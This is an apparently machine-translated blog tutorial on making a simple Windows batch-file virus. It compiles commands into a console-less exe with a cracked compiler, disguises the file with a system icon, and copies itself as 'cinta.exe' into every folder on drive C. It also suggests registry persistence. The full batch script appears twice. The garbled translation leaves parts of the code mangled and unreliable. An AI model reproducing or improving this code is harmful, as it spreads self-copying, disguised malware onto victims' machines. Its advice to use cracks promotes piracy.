That need to be prepared:
1. Quick Batch File Compiler Software (quickbfc.exe) 2. License key or crack from quickbfc 3. Knowledge of command cmd 4. Icon Changer Software
www.abyssmedia.com quickbfc is software from which this software can be used to compile (or whatever his name aja) perintah2 cmd into exe files. One of the privileges quickbfc is its ability to make an exe file that is created when the run will not display the console window. This feature can be set by selecting Project => option => ghost application. It's just who can use this feature only full version (or it could be on crack).
Icon Changer (IC) is required to find the icon as the icon belongs windows. IC can be downloaded at http://www.shelllabs.com/. After opening the IC, the search icon in folder windows \ system32, there will be many interesting icons, such as a folder icon, icon text, etc.. Having met the desideratum icon save icon.
Now we discuss the problem cmdnya command. One characteristic of viruses is the ability to multiply. As we know if we create a bat file contents dg "copy% 0 c: \" then it will result in a bat file was dicopikan to c: \. But when we use the same command in quickbfc then the result is not like that, in the sense that exe file is generated when the run will not be in the copies to drive c: \. To get around this we can use another way is by the command "for%% a in (*. exe) do if%% ~ za EQU 12 345 copy%% ac: \ arira.exe".
This command means "for every exe file in this directory if the file size of 12,345 bytes of the file copikan (12,345 bytes last-sized) to c: \ dg arira.exe name". 12 345 is the file size of the compiled results quickbfc virus (for example). Imaginable problem is if there is an exe file size is the same and who are on the same folder with our virus file.
Ok, then make other orders. We can do something so that our virus on the run will open up my documents. The command "explorer% userprofile%". Terusss, this command can be a bit annoying for / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d", this command means "for every folder, subfolder on drive c copikan file c: \ arira.exe in your folder with the name cinta.exe ". then after the completion of this command is executed all the folders and subfolders in c: \ will have a file cinta.exe. And so on .... And so he ordered his own thinking ... .. for example make a value in regedit let the virus can live again after the computer restarts, etc..
Example: The command cmd we have made
REM This is the beginning of the script for%% a in (*. exe) do if%% ~ za EQU 12 345 copy "%% a" c: \ arira.exe Explorer% userprofile% for / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d" REM This is the end of the script
Before you select a custom compiled resources to set the icon of the file to be generated. Compile scripts above, then look at the size of the generated exe file. Suppose the resulting file size is 82,571, then replace the scripts above, so be
REM This is the beginning of the script for%% a in (*. exe) do if%% ~ za EQU 82 571 copy "%% a" c: \ arira.exe Explorer% userprofile% for / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d" REM This is the end of the script
Compile again, see the resulting file size. If size is 82,571 bytes then it is correct. If not, repeat until the number on the same scripts with the resulting file size.
Description: In the example above the command "for%% a in (*. exe) do if%% ~ za EQU 82 571 copy%% ac: \ arira.exe" can not be used for cmd (only for scripts), use this command if pingin change in eating cmd%% a with% a, so the command would be "for% a in (*. exe) do if% ~ za EQU 82,571 copies% ac: \ arira.exe"
0 komentar:
Posting Komentar